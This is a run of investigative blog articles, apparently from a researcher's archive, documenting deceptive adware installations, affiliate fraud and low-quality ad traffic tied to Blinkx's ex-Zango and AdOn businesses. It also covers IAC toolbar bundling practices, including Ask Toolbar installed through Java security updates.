In a particularly spirited section of its reply, Blinkx declined to provide the revenue apportionment I suggested. Rather, Blinkx said it “places equal importance on all of its product lines and acquisitions.” I credit Blinkx’s argument that it “is under no obligation to expend resources and energy to detail information beyond its regulatory requirements.” Yet my suggestion has an undeniable appeal. If adware is in fact small, then Blinkx could address investors’ concerns by showing the size of this business. Conversely, failure to provide such proof reinforces my suspicion — and Ken’s! — that adware is and has been a significant revenue source for Blinkx. Meanwhile, Blinkx’s approach also strengthens the inference that adware is significant: If adware were not important to Blinkx, shrewd managers would have elected to discard this controversial business years ago.

Meanwhile, I’ve gotten back in touch with other computer security researchers who have found other deceptive installations of Blinkx adware. We used to write articles about adware weekly, but we’ve subsequently largely moved on to other things, and it takes a while to resuscitate the prior spirit of testing and exposition. Nonetheless, I expect more reports from others in due course.

Looking at Blinkx’s practices as a while, it is striking to see Blinkx paying distributors to put its adware on users’ computers without the hard-fought protections the FTC previously demanded of Zango. Seven years ago, Zango promised to cease these practices, and it paid a multi-million dollar fine to disgorge a portion of its ill-gotten gains. Facing equally brazen conduct continuing after that consent order, the FTC should demand even more far-reaching remedies here.

My testing of Blinkx ex-Zango adware began in 2004 with unpaid writing on my web site, and has grown to include paid and unpaid work for advertisers, ad networks, publishers, investors, and regulators. However, none of these requested or funded this article or any portion of the research presented in this article.

The Darker Side of Blinkx

Video and advertising conglomerate Blinkx tells investors its “strong performance” results from “strategic initiatives” and “expanding demand, content, and audiences.” Indeed, Blinkx recently climbed past a $1.2 billion valuation. At first glance, it sounds like a great business. But looking more carefully, I see reason for grave doubts.

My concerns result in large part from the longstanding practices of two of Blinkx’s key acquisitions, Zango and AdOn. But concerns extend even to Blinkx’s namesake video site. In the following sections, I address each in turn. Specifically, I show ex-Zango adware still sneaking onto users’ computers and still defrauding advertisers. I show the ex-AdOn traffic broker still sending invisible, popup, and other tainted traffic. I show Blinkx’ namesake site, Blinkx.com, leading users through a maze of low-content pages, while charging advertisers for video ads systematically not visible to users.

The Legacy Zango (Adware) Business

In April 2009, Blinkx acquired a portion of Zango, a notorious adware vendor known for products that at various times included 180 Search Assistant, ePipo, Hotbar, Media Gateway, MossySky, n-Case, Pinball, Seekmo, SpamBlockerUtility, and more. Zango was best known for its deceptive and even nonconsensual installations — in write-ups from 2004 to 2008, I showed Zango installing through security exploits (even after design updates purportedly preventing such installations by supposed rogue partners), targeting kids and using misleading statements, euphemisms, and material omissions, installing via deceptive ActiveX popups, These and other practices attracted FTC attention, and in a November 2006 settlement, Zango promised to cease deceptive installations as well as provide corrective disclosures and pay a $3 million penalty.

Few users would affirmatively request adware that shows extra pop-ups, so Blinkx and its distributors use deceptive tactics to sneak adware onto users’ computers. In a representative example, I ran a Google search for “Chrome” (Google’s well-known web browser), clicked an ad, and ended up at Youdownloaders.com — a site that bundles Chrome with third-party advertising software. (The Youdownloaders footer states “The installers are compliant with the original software manufacturer’s policies and terms & conditions” though it seems this claim is untrue: Chrome Terms of Service section 5.3 disallows copying and redistributing Chrome; 8.6 disallows use of Google’s trademarks in a way that is likely to cause confusion; 9.3 disallows transfer of rights in Chrome.) In my testing, the Youdownloaders installer presented offers for five different adware programs and other third-party applications, among them Weather Alerts from desktopweatheralerts.com. Installation video.

I consider the Youdownloaders installation deceptive for at least four reasons: 1) A user’s request for free Chrome software is not a proper circumstance to tout adware. The user gets absolutely nothing in exchange for supposed “agreement” to receive the adware; Chrome is easily and widely available for free, without adware. It is particularly one-sided to install five separate adware apps — taking advantage of users who do not understand what they are asked to accept (including kids, non-native speakers, and those in a hurry). 2) On the Weather Alerts page of the installation, on-screen statements mention nothing of pop-up ads or, indeed, any advertising at all. In contrast, the FTC’s settlement with Zango requires that disclosure of advertising practices be “clear and prominent,” “unavoidable,” and separate from any license agreement — requirements not satisfied here. 3) The Youdownloaders user interface leads users to think that the bundled installations are compulsory. For example, the “decline” button (which lets a user reject each adware app) appears without the distinctive shape, outline, color, or font of an ordinary Windows button. 4) Users are asked to accept an objectively unreasonable volume of agreements and contracts, which in my testing include at least 14 different documents totaling 37,564 words (8.5 times the length of the US Constitution).

Tellingly, Blinkx takes considerable steps to distance itself from these deceptive practices. For example, nothing on Blinkx’s site indicates that Weather Alerts is a Blinkx app or shows Blinkx ads. The Desktopweatheralerts.com site offers no name or address, even on its Contact Us form. Weather Alerts comes from a company called Local Weather LLC, an alter ego of Weather Notifications LLC, both of Minneapolis MN, with no stated affiliation with Blinkx. Weather Notifications’ listed address is a one-bedroom one-bathroom apartment — hardly a standard corporate office. Nonetheless, multiple factors indicate to me that Desktop Weather Alerts is delivers a version of Zango adware. For one, Desktop Weather Alerts popups use the distinctive format long associated with Zango, including the distinctive browser buttons at top-left, as well as distinctive format of the advertisement label at bottom-left. Similarly, many sections of the license agreement and privacy policy are copied verbatim from longstanding Zango terms. Within the Weather Alerts EXE, strings reference 180search Assistant (a prior Zango product name) as well as 180client and various control systems long associated with Zango’s ad-targeting system. Similarly, when Weather Alerts delivers ads, its ad-delivery communications use a distinctive proprietary HTTP syntax both for request (to showme.aspx, with a HTTP POST parameter of epostdata= providing encoded ad context) and response (a series of HTML FORM elements, most importantly an INPUT NAME=ad_url to indicate the popup to open). I have seen this syntax (and its predecessors) in Zango apps for roughly a decade, but I have never seen this syntax used by any advertising delivered by other adware vendors or other companies. Moreover, when a Blinkx contractor previously contacted a security vendor to request whitelist treatment of its adware, the Blinkx representative said “The client is Blinkx … Your engine … was flagging their installer package SWA as SevereWeatherAlerts…” (emphasis added). Notice the Blinkx representative indicating that SWA (another Local Weather program, virtually identical save for domain name and product name) is “their” app, necessarily referring to Blinkx. Finally, in a February 2014 presentation, Blinkx CEO Brian Mukherjee included the distinctive Local Weather icon (present throughout the LW app and in LW’s installation solicitations) as part of the “Blinkx Ecosystem” — further confirming the link between LW and Blinkx. Taken together, these factors give good reason to conclude that Local Weather is applications are powered by Blinkx and part of the Blinkx network. Furthermore, in my testing Blinkx is the sole source of advertising for Weather Alerts — meaning that Blinkx’s payments are Weather Alerts’ primary source of revenue and primary reason for existence. (Additions made February 13, 2014, shown in grey highlighting.)

Blinkx/Zango software continues to defraud affiliate merchants. Blinkx/Zango software continues to defraud affiliate merchants.

Meanwhile, Zango-delivered advertising remains a major cause of concern. Zango’s core advertising product remains the browser popup — a disruptive form of advertising unpopular with most users and also unpopular with most mainstream advertisers. Notably, Zango’s popups perpetrate various advertising fraud, most notably ‘lead stealing” affiliate windows that cover merchant sites with their own affiliate links. If the user purchases through either window, the Zango advertiser gets paid a commission — despite doing nothing to genuinely cause or encourage the user’s purchase. (Indeed, the popup interrupts the user and thereby somewhat discourages a purchase.) At right, I show a current example: In testing of January 19, 2014, Blinkx/Zango sees a user browsing Walmart, then opens a popup to Blinkx/LeadImpact (server lipixeltrack) which redirects to LinkShare affiliate ORsWWZomRM8 and on to Walmart. Packet log proof. Thus, Walmart ends up having to pay an affiliate commission on traffic it already had — a breach of Walmart’s affiliate rules and broadly the same as the practice for which two eBay affiliates last year pled guilty. I’ve reported Zango software used for this same scheme since June 2004. As shown at right and in other recent examples, Zango remains distinctively useful to rogue affiliates perpetrating these schemes. These rogue affiliates pay Blinkx to show the popups that set the scheme in motion — and I see no sign that Blinkx has done anything to block this practice.

Rather than put a stop to these practices, Blinkx largely attempts to distance itself from Zango’s legacy business. For one, Blinkx is less than forthright as to what exactly it purchased. In Blinkx’s 2010 financial report, the first formal investor statement to discuss the acquisition, Blinkx never uses the word “Zango” or otherwise indicates the specific company or assets that Blinkx acquired. Rather, Blinkx describes the purchase as “certain net assets from a consortium of financial institutions to facilitate the growth of the video search and advertising businesses.” If a reader didn’t already know what Blinkx had bought, this vague statement would do nothing to assist.

Even when Blinkx discusses the Zango acquisition, it is less than forthcoming. UK news publication The Register quotes an unnamed Blinkx spokeswoman saying that Blinkx “purchased some technical assets from the bank [that foreclosed on Zango] including some IP and hardware, which constituted about 10 per cent of Zango’s total assets.” Here too, readers are left to wonder what assets are actually at issue. A natural interpretation of the quote is that Blinkx purchased trademarks, domain names, or patents plus general-purpose servers — all consistent with shutting the controversial Zango business. But in fact my testing reveals the opposite: Blinkx continues to run key aspects of Zango’s business: legacy Zango installations continue to function as usual and continue to show ads, and Blinkx continues to solicit new installations via the same methods, programs, and partners that Zango previously used. Furthermore, key Zango staff joined Blinkx, facilitating the continuation of the Zango business. Consider Val Sanford, previously a Vice President at Zango; her LinkedIn profile confirms that she stayed with Blinkx for three years after the acquisition. I struggle to reconcile these observations with the claim that Blinkx only purchased 10% of Zango or that the purchase was limited to “IP and hardware.” Furthermore, ex-Zango CTO Ken Smith contemporaneously disputed the 10% claim, insisting that “Blinkx acquired fully 100% of Zango’s assets.”

Blinkx has been equally circumspect as to the size of the ex-Zango business. In Blinkx’ 2010 financial report, Blinkx nowhere tells investors the revenue or profit resulting from Zango’s business. Rather, Blinkx insists “It is not practical to determine the financial effect of the purchased net assets…. The Group’s core products and those purchased have been integrated and the operations merged such that it is not practical to determine the portion of the result that specifically relates to these assets.” I find this statement puzzling. The ex-Zango business is logically freestanding — for example, separate relationships with the partners who install the adware on users’ computers. I see no proper reason why the results of the ex-Zango business could not be reported separately. Investors might reasonably want to know how much of Blinkx’s business comes from the controversial ex-Zango activities.

Indeed, Blinkx’s investor statements make no mention whatsoever of Zango, adware, pop-ups, or browser plug-ins of any kind in any annual reports, presentations, or other public disclosures. (I downloaded all such documents from Blinkx’ Financial Results page and ran full-text search, finding no matches.) As best I can tell, Blinkx also failed to mention these endeavors in conference calls or other official public communications. In a December 2013 conference call, Jefferies analyst David Reynolds asked Blinkx about its top sources of traffic/supply, and management refused to answer — in sharp contrast to other firms that disclose their largest and most significant relationships.

In March-April 2012, many ex-Zango staff left Blinkx en masse. Many ended up at Verti Technology Group, a company specializing in adware distribution. Myriad factors indicate that Blinkx controls Verti: 1) According to LinkedIn, Verti has eight current employees of which five are former employees of Zango, Pinball, and/or Blinkx. Other recent Verti employees include Val Sanford, who moved from Zango to Blinkx to Verti. 2) Blinkx’s Twitter account: Blinkx follows just nineteen users including Blinkx’s founder, various of its acquisitions (including Prime Visibility / AdOn and Rhythm New Media), and several of their staff. Blinkx follows Verti’s primary account as well as the personal account of a Verti manager. 3) Washington Secretaty of State filings indicate that Verti’s president is Colm Doyle (then Directory of Technology at Blinkx, though he subsequently returned to HP Autonomy) and secretary, treasurer, and chairman is Erin Laye (Director of Project Management at Blinkx). Doyle and Laye’s links to Blinkx were suppressed somewhat in that both, at formation, specified their home addresses instead of their Blinkx office. 4) Whois links several Verti domains to Blinkx nameservers. (Details on file.) Taken together, these facts suggest that Blinkx attempted to move a controversial business line to a subsidiary which the public is less likely to recognize as part of Blinkx.

The Legacy AdOn Business

In November 2011, Blinkx acquired Prime Visibility Media Group, best known for the business previously known as AdOn Network and MyGeek. I have critiqued AdOn’s traffic repeatedly: AdOn first caught my eye when it boasted of relationships with 180solutions/Zango and Direct Revenue. New York Attorney General litigation documents later revealed that AdOn distributed more than 130,000 copies of notorious Direct Revenue spyware. I later repeatedly reported AdOn facilitating affiliate fraud, inflating sites’ traffic stats, showing unrequested sexually-explicit images, and intermediating traffic that led to Google click fraud.

Similar problems continue. For example, in a February 2013 report for a client, I found a botnet sending click fraud traffic through AdOn’s ad-feeds.com server en route to advertisers. In an August 2013 report for a different client, I found invisible IFRAMEs sending traffic to AdOn’s bing-usa.com and xmladfeed.com servers, again en route to advertisers. Note also the deceptive use of Microsoft’s Bing trademark — falsely suggesting that this tainted traffic is in some way authorized by or affiliated with Bing, when in fact the traffic comes from AdOn’s partners. Moreover, the traffic was entirely random and untargeted — keywords suggested literally at random, entirely unrelated to any aspect of user interests. In other instances, I found AdOn receiving traffic directly from Zango adware. All told, I reported 20+ distinct sequences of tainted AdOn traffic to clients during 2013. AdOn’s low-quality traffic is ongoing: Advertisers buying from AdOn receive invisible traffic, adware/malware-originating traffic, and other tainted traffic that sophisticated advertisers do not want.

An AdOn staff member touts multiple incriminating characteristics of AdOn traffic. An AdOn staff member touts multiple incriminating characteristics of AdOn traffic.

Industry sources confirm my concern. For example, a June 2013 Ad Week article quotes one publisher calling AdOn “just about the worst” at providing low-quality traffic, while another flags “crazy traffic patterns.” In subsequent finger-pointing as to tainted traffic to OneScreen sites, OneScreen blamed a partner, Touchstorm, for working with AdOn — wasting no words to explain why buying from AdOn is undesirable. Even intentional AdOn customers report disappointing quality: In comments on a posting by Gauher Chaudhry, AdOn advertisers call AdOn “the reason I stopped doing any PPV [pay-per-view] … this is bot traffic”, “junk”, and “really smell[s] like fake traffic.” Of 31 comments in this thread, not one praised AdOn traffic quality.

Recent statements from AdOn employees confirm undesirable characteristics of AdOn traffic. Matthew Papke’s LinkedIn page lists him as Director of Contextual Ads at AdOn. But his page previously described AdOn’s offering as “pop traffic” — admitting undesirable non-user-requested pop-up inventory. His page called the traffic “install based” — indicating that the traffic comes not from genuine web pages, but from adware installed on users’ computers. See screenshot at right. All of these statements have been removed from the current version of Matthew’s page.

Problems at Blinkx.com: Low-Quality Traffic, Low-Quality Content, and Invisible Ads

Alexa reports a sharp jump in Blinkx traffic in late 2013. Alexa reports a sharp jump in Blinkx traffic in late 2013.

Alexa reports a sharp jump in Blinkx traffic in late 2013. Zango adware caused my computer to display this page from the Blinkx site, full-screen and without standard window controls.

Blinkx’s namesake service is the video site Blinkx.com. Historically, this site has been a bit of an also-ran — it’s certainly no YouTube! But Alexa reports a striking jump in Blinkx popularity as of late 2013: Blinkx’s traffic jumped from rank of roughly 15,000 worldwide to, at peak, rank of approximately 3,000. What could explain such a sudden jump?

In my automated and manual testing of Zango adware, I’ve recently begun to see Zango forcing users to visit the Blinkx site. The screenshot at right gives an example. My test computer displayed Blinkx full-screen, without title bar, address bar, or standard window buttons to close or minimize. See also a partial packet log, wherein the Blinkx site attributes this traffic to Mossysky (“domain=mossysky”), one of the Zango brand names. It’s a strikingly intrusive display — no wonder users are complaining, about their computers being unusable due to Blinkx’s unwanted intrusion. See e.g. a December 2013 Mozilla forum post reporting “my computer has been taken over by malware, half the links are inaccessible because of hovering links to Blinkx,” and a critique and screenshot showing an example of these hovering links. On a Microsoft support forum, one user reports Internet Explorer automatically “opening … numerous BLINKX websites” — as many as “20 websites open at one time, all Blinkx related.”

Moreover, Alexa’s analysis of Blinkx visitor origins confirms the anomalies in this traffic. Of the top ten sites sending traffic to Blinkx, according to Alexa, six are Blinkx servers, largely used to forward and redirect traffic (networksad.com, advertisermarkets.com, networksads.com, advertiserdigital.com, blinkxcore.com, and networksmarkets.com). See Alexa’s Site Info for Blinkx.com at heading “Where do Blinkx.com’s visitors come from?”

Strikingly, Zango began sending traffic to Blinkx during the winter 2013 holiday season — a time of year when ad prices are unusually high. Zango’s popups of Blinkx seem to have ended as suddenly as they began — consistent with Blinkx wanting extra traffic and ad revenue when ad prices are high, but concluding that continuing this practice at length risks excessive scrutiny from both consumers and advertisers.

Meanwhile, examining Blinkx.com, I’m struck by the lack of useful content. I used the Google search site:blinkx.com to find the parts of the Blinkx site that, according to Google, are most popular. I was directed to tv.blinkx.com, where the page title says users can “Watch full episodes of TV shows online.” I clicked “60 Minutes” and received a page correctly profiling the excellence of that show (“the granddaddy of news magazines”). But when I clicked to watch one of the listed episodes, I found nothing of the kind: Requesting “The Death and Life of Asheboro, Stealing History, The Face of the Franchise,” I was told to “click here to watch on cbs.com” — but the link actually took me to a 1:33 minute home video of a dog lying on the floor, “Husky Says No to Kennel”, syndicated from YouTube, entirely unrelated to the top-quality 60 Minutes content I had requested. (Screen-capture video.) It was a poor experience — not the kind of content likely to cause users to favor Blinkx’s service. I tried several other shows supposedly available — The Colbert Report, The Daily Show with Jon Stewart, Family Guy, and more — and never received any of the listed content.

In parallel, the Blinkx site simultaneously perpetrated a remarkable scheme against advertisers: On the video index page for each TV show, video advertising was triggered to play as I exited each page by clicking to view the supposed video content. Because the supposed content opened in a new tab, the prior tab remained active and could still host a video player with advertising. Of course the prior tab was necessarily out of visibility: Blinkx’s code had just commanded the opening of a new tab showing the new destination. But the video still played, and video advertisers were still billed. Screen-capture video.

Industry sources confirm concerns about Blinkx ad visibility. For example, a December 15, 2013 Ad Week piece reported Vindico analysis finding just 23% of Blinkx videos viewable (defined as just 50% of pixels visible for just one second). By Vindico’s analysis, an advertiser buying video ads from Blinkx suffers three ads entirely invisible for every ad visible even by that low standard — a remarkably poor rate of visibility. In contrast, mainstream video sites like CBS and MSN enjoyed viewability rates two to four times higher.

Putting the Pieces Together

  Q3 ’13 Headcount ’13 Revenue ($mm) revenue / headcount ($k)
Tremor 287 $148 $517
YuMe 357* $157 $440
RocketFuel 552 $240 $434
Criteo 452 $240 $532
Blinkx 265** $246*** $927

* Q3 ’13 headcount not available. 357 is 2012 year-end. S&M spend up ~50% in 2013. Adjusted revenue/headcount is $293k
** Q3 ’13 headcount not available. 265 is 2012 year-end. S&M spend up ~15% in 2013. Adjusted revenue/headcount is $803k.
*** 2013 revenue estimate based on Bloomberg consensus estimates

Comparing Blinkx’s revenues to competitors, I am struck by Blinkx’s apparent outsized success. See the table at right, finding Blinkx producing roughly twice as much revenue per employee as online video/display ad networks and advertising technology companies which have recently made public offerings. Looking at Blinkx’s sites and services, one doesn’t get the sense that Blinkx’s service is twice as good, or its employees twice as productive, as the other companies listed. So why does Blinkx earn twice as much revenue per employee? One natural hypothesis is that Blinkx is in a significantly different business. While other services make significant payments to publishers for use of their video content, my browsing of Blinkx.com revealed no distinctive content obviously licensed from high-quality high-cost publishers. I would not be surprised to see outsized short-term profits in adware, forced-visit traffic, and other black-hat practices of the sort used by some of the companies Blinkx has acquired. But neither are these practices likely to be sustainable in the long run.

Reviewing Blinkx’s statements to investors, I was struck by the opacity. How exactly does Blinkx make money? How much comes from the legacy Zango and AdOn businesses that consumers and advertisers pointedly disfavor? Why are so many of Blinkx’s metrics out of line with competitors? The investor statements raise many questions but offer few answers. I submit that Blinkx is carefully withholding this information because the company has much to hide. If I traded in the companies I write about (I don’t!), I’d be short Blinkx.

This article draws in part on research I prepared for a client that sought to know more about Blinkx’s historic and current practices. At my request, the client agreed to let me include portions of that research in this publicly-available posting. My work for that client yielded a portion of the research presented in this article, though I also conducted significant additional research and drew on prior work dating back to 2004. My agreement with the client did not oblige me to circulate my findings as an article or in any other way; to my knowledge, the client’s primary interest was in learning more about Blinkx ‘s business, not in assuring that I tell others. By agreement with the client, I am not permitted to reveal its name, but I can indicate that the client is two US investment firms and that I performed the research during December 2013 to January 2014. The client tells me that it did not change its position on Blinkx after reading my article. (Disclosure updated and expanded on February 4-5, 2014.)

I thank Eric Howes, Principal Lab Researcher at ThreatTrack Security, and Matthew Mesa, Threat Researcher at ThreatTrack Security, for insight on current Blinkx installations.

The Ad Networks and Advertisers that Fund Ad Injectors with Wesley Brandi

Webcake adware inserts an AT&T ad into the YouTube site without permission from Google.Webcake adware inserts an AT&T ad into the YouTube site without permission from Google.

Ad injectors insert ads into others’ sites, without permission from those sites and without payment to those sites. In this article, we review the basic operation of ad injectors, then examine the ad networks, exchanges, and other intermediaries that broker the placement of advertising through injectors.

We also report which advertisers most often advertise through injectors. Whether through complexity, inattention, or indifference, these advertisers’ expenditures are ultimately the sole revenue source for injectors.

The Ad Networks and Advertisers that Fund Ad Injectors

IAC Toolbars and Traffic Arbitrage in 2013

Beginning in 2005, I flagged serious problems with IAC/Ask.com toolbars — including installations through security exploits and through bundles that nowhere sought user consent, installations targeting kids, rearranging users’ browsers to invite unintended searches, and showing a veritable onslaught of ads. IAC’s practices have changed in various respects, but the core remains as I previously described it: IAC’s search advertising business exists not to solve a genuine user need or provide users with genuine assistance, but to prey on users who — through inattention, inexperience, youth, or naivete — stumble into IAC’s properties.

Crucially, IAC remains substantially dependent on Google for monetization of IAC’s search services. A rigorous application of Google’s existing rules would put a stop to many of IAC’s practices, and sensible updated rules — following the stated objective of Google’s existing policies — would end much of the rest.

In this piece I examine current IAC toolbar installation practices (including targeting kids and soliciting installations when users are attempting to install security updates), the effects of IAC toolbars once installed (including excessive advertising and incomplete uninstall), and IAC’s search arbitrage business. I conclude by flagging advertisements with impermissibly large clickable areas (for both toolbars and search arbitrage), and I call on Google to put an end to Ask’s practices.

IAC Toolbar Installation

IAC’s search toolbar business is grounded in placing IAC toolbars on as many computers as possible. To that end, IAC offers 50+ different toolbars with a variety of branding — Webfetti (“free Facebook graphics”), Guffins (“virtual pet games”), religious toolbars of multiple forms (Know the Bible, Daily Bible Guide, Daily Jewish Guide), screensavers, games, and more. One might reasonably ask: Why would a user want such a toolbar?

IAC ad promises 'free online television' but actually merely links to material already on the web; promises an 'app' but actually provides a search toolbar. IAC ad promises “free online television” but actually merely links to material already on the web; promises an “app” but actually provides a search toolbar.

IAC ad solicits installations via 'virtual pet' ad distinctively catering to kids.IAC ad solicits installations via “virtual pet” ad distinctively catering to kids.

Other IAC Guffins ads specifically invite 'kids' to install. (Screenshot by iSpionage) Other IAC Guffins ads specifically invite “kids” to install. (Screenshot by iSpionage)

IAC Guffins offer features multiple animated cartoon images, distinctively catering to kids.

The Television Fanatic toolbar is instructive. IAC promotes this toolbar with search ads that promise “free online television” and “turn your computer into a TV watch full TV episode w free app.” It sounds like an attractive deal — many users would relish the ability to watch free live broadcast television on an ordinary computer, and it would not be surprising if such a service required downloading some sort of desktop application or browser plug-in. But in fact Television Fanatic offers nothing of the sort. To the extent that Television Fanatic offers the “free online television” promised in the ad, it only links to ordinary video content already provided by others. (For example, I clicked the toolbar’s “ABC” link and was taken to http://abc.go.com/watch/ — an ordinary ABC link equally available to users without Television Fanatic. That’s a far cry from IAC’s promise of special access to premium material.

Meanwhile, IAC’s Guffins toolbar distinctively targets kids. IAC promotes Guffins via search ads for terms like “virtual pet”, and the resulting ad says Guffins offers “puppy, cats, bunny, dragons & more” which a user can “feed, play, [and] care for.” The landing page features four animated animals with oversized faces and overstated features, distinctively attractive to children. Under COPPA factors or any intuitive analysis, IAC clearly targets kids. Indeed, ad tracking service iSpionage reports Guffins ads touting “Free Kids Games Download”, “Free Kids Computer Games”, “Play Kids Games Online”, and more — explicitly inviting children to install Guffins. Of course kids are ill-equipped to evaluate IAC’s offer — less likely to notice IAC’s disclosures of an included toolbar, less likely to understand what a search toolbar even is, and less able to evaluate the wisdom of installing such a toolbar in exchange for games.

While IAC’s ads often promise an “app” (including as shown in the ad screenshots at right), IAC actually offers just toolbars — add-ins appearing within web browsers, not the freestanding applications that the ads suggest. That’s all the more deceptive: IAC enticed users with the promise of genuine distinct programs offering exceptional video content and rich gaming. Instead IAC provided browser plug-ins that claim valuable screen space whenever users browse the web. And far from providing exclusive content, IAC toolbars send users to material already on the web and driving traffic to IAC’s advertising displays (as detailed in the next section). That’s strikingly inferior.

IAC’s toolbar installation practices stack up unfavorably vis-a-vis applicable Google policies, industry standards, and regulatory requirements. Google’s Software Principles call for “Upfront disclosure” with no suggestion that an app may promise one thing in an initial solicitation, then something else in a subsequent landing page. (IAC is obliged to comply with Google’s rules because IAC toolbars show ads from Google, as discussed in the next section.) Meanwhile, the Anti-Spyware Coalition specifically flags installations targeting children, allowing bundling by affiliates, and modifying browser settings as risk factors making software a greater concern. Even decades-old FTC rules are on point, disallowing “deceptive door openers” that promise one thing at the outset (like IAC’s initial promise of “free online television”) but later deliver something importantly different (a search toolbar).

Web searches reveal numerous user complaints about IAC toolbars. Consider search results for “televisionfanatic”. A first result links to product’s official site. Second is a Sitejabber forum with 20 harsh reviews. (17 reviewers gave Television Fanatic just one star out of five, with comments systematically reporting surprise and annoyance at the toolbar’s presence.) The third result advises “How to uninstall a Television fanatic toolbar”, and the fourth is multiple Yahoo Answers discussions including a user asking “Is television fanatic toolbar a virus?” and others repeatedly complaining about unintended installation. Clearly numerous users are dissatisfied with Television Fanatic.

So too for DailyBibleGuide. In a Q1 2011 earnings call, IAC CEO Greg Blatt touted the DailyBibleGuide toolbar as a new product IAC is particularly proud of. But a Google search results for “DailyBibleGuide” include a page advising “do not download Dailybiblestudy, Dailybibleguide, or Knowthebible extension.” There and elsewhere, users seem surprised to receive IAC’s toolbars. Reading users’ complaints, it seems their confusion ultimately results from IAC’s decision to deliver bible trivia via a toolbar. After all, such material would more naturally be delivered via a web page, email newsletter, or perhaps RSS feed. IAC chose the odd strategy of toolbar-based delivery not because it was genuinely what users wanted, but because this is the format IAC can best monetize. No wonder users systematically end up disappointed.

By all indications, a huge number of users are running IAC toolbars. The IAC toolbars discussed in this section all send users to mywebsearch.com, a site users are unlikely to visit except if sent there by an IAC toolbar. Alexa reports that mywebsearch.com is the #41 most popular site in the US and #71 worldwide — more popular than Instagram, Flickr, Pandora, and Hulu.

Some of IAC’s browser configuration changes remain in place even if a user removes an IAC toolbar. I installed then uninstalled an IAC Television Fanatic toolbar and received a prompt instructing “Click here for help on resetting your home page and default search settings.” The resulting page specified four different procedures totaling 16 steps — far more lengthy than the initial installation. I can see no proper reason why uninstall is so difficult. Indeed, IAC’s incomplete uninstall specifically violates Google’s October 2012 requirement that “During the uninstall process, users must be presented with a choice that gives them the option of returning their browser’s user settings to the previous settings.” Google’s Software Principles are also on point, instructing that uninstall must be “easy” and must disable “all functions of the application” — whereas IAC’s automated installer does not undo all of IAC’s changes, and IAC’s manual 16-step process is the opposite of “easy.”

The Special Problems of IAC Ask Toolbar Installed by Oracle’s Java Updates

Oracle Java security updates install Ask Toolbar by default, with just a single click in a multi-step installer. Java security update installs Ask Toolbar by default — a single click in a multi-step installer.

Ongoing Oracle Java updates also install the IAC Ask Toolbar. I discuss these installations in this separate section because they raise concerns somewhat different from the IAC toolbars discussed above. I see five key problems with Oracle Java updates that install IAC toolbars:

First, as Ed Bott noted last week, the “Install the Ask Toolbar” checkbox is prechecked, so users can install the Ask toolbar with a single click on the “Next” button. Accidental installations are particularly likely because the Ask installation prompt is step three of five-screen installation process. When installing myriad software updates, it’s easy to get into a routine of repeatedly clicking Next to finish the process as quickly as possible. But in this case, just clicking Next yields the installation of Ask’s toolbar.

Second, although the Ask installation prompt does not show a “focus” (a highlighted button designated as the default if a user presses enter), the Next button actually has focus. In testing, I found that pressing the enter or spacebar keys has the same effect as clicking “Next.” Thus, a single press of either of the two largest keys on the keyboard, with nothing more, is interpreted as consent to install Ask. That’s much too low a bar — far from the affirmative indication of consent that Google rules and FTC caselaw call for.

Third, in a piece posted today, Ed Bott finds Oracle and IAC intentionally delaying the installation of the Ask Toolbar by fully ten minutes. This delay undermines accountability, especially for sophisticated users. Consider a user who mistakenly clicks Next (or presses enter or spacebar) to install Ask Toolbar, but immediately realizes the mistake and seeks to clean his computer. The natural strategy is to visit Control Panel – Programs and Features to activate the Ask uninstaller. But a user who immediately checks that location will find no listing for the Ask Toolbar: The uninstaller does not appear until the Ask install finishes after the intentional ten minute delay. Of course even sophisticated users have no reason or ability to know about this delay. Instead, a sophisticated user would conclude that he somehow did not install Ask Toolbar after all — and only later will the user notice and, perhaps, proceed with uninstall. Half a decade ago I found WhenU adware engaged in similar intentional delay. Similarly, NYAG litigation documents revealed notorious spyware vendor Direct Revenue intentionally declining to show ads in the first day after its installation. (Direct Revenue staff said this delay would “reduce the correlation between the Morpheus download [which bundled Direct Revenue spyware] and why they are seeing [Direct Revenue’s popup] ads” — confusion that DR staff hoped would “creat[e] less of a path to what they [users] should uninstall.”) Against this backdrop, it’s particularly surprising to see IAC and Oracle adopt this tactic.

Fourth, IAC makes changes beyond the scope of user consent and fails to revert these changes during uninstall. The Oracle/IAC installation solicitation seeks permission to install an add-on for IE, Chrome, and Firefox, but nowhere mentions changing address bar search or the default Chrome search provider. Yet the installer in fact makes all these changes, without ever seeking or receiving user consent. Conversely, uninstall inexplicably fails to restore these settings. As noted above, these incomplete uninstalls violate Google’s Software Principles requirement that an “easy” uninstall must disable “all functions of the application.”

Finally, the Java update is only needed as a result of a serious security flaw in Java. It is troubling to see Oracle profit from this security flaw by using a security update as an opportunity to push users to install extra advertising software. Java’s many security problems make bundled installs all the worse: I’ve received a new Ask installation prompts with each of Java’s many security updates. (Ed Bott counts 11 over the last 18 months.) Even if the user had declined IAC’s offer on half a dozen prior requests, Oracle persists on asking — and a single slip-up, just one click or keystroke on the tenth request, will nonetheless deliver Ask’s toolbar.

A security update should never serve as an opportunity to push additional software. As Oracle knows all too well from its recent security problems, users urgently need software updates to fix serious vulnerabilities. By bundling advertising software with security updates, Oracle teaches users to distrust security updates, deterring users from installing updates from both Oracle and others. Meanwhile, by making the update process slower and more intrusive, Oracle reduces the likelihood that users will successfully patch their computers. Instead, Oracle should make the update process as quick and easy as possible — eliminating unnecessary steps and showing users that security updates are quick and trouble-free.

Toolbar Operations and Result Format

Once a user receives an IAC toolbar, a top-of-browser stripe appears in Internet Explorer and Firefox, and IAC also takes over default search, address bar search, and error handling. That’s an intrusive set of changes, and particularly undesirable in light of the poor quality of IAC’s search results.

If a user runs a search through an IAC toolbar or through a browser search function modified by IAC, the user receives Mywebsearch or Ask.com results page with advertisements and search results syndicated from Google. The volume of advertisements is remarkable: On a 800×600 monitor, the entire first two screens of Mywebsearch results presented advertisements (screen one, screen two) — four large ads with a total of seven additional miniature ads contained within. The first algorithmic search result appears on the third on-screen page, where users are far less likely to see it. At Ask.com, ads are even larger: fully seven advertisements appear above the first algorithmic result, and three more ads appear at page bottom — more than filling two 800×600 screens.

IAC obtains these advertisements and search results from Google, but IAC omits features Google proudly touts in other contexts. For example, Google claims that its maps, hotel reviews, and hotel price quotes benefit users and save users time — but inexplicably IAC Mywebsearch lacks these features, even though these features appear prominently and automatically for users who run the same search at Google. In short, a user viewing IAC results gets listings that are intentionally less useful — designed to serve IAC’s business interest in encouraging the user to click extra advertisements, with much less focus on providing the information that IAC and Google consider most useful.

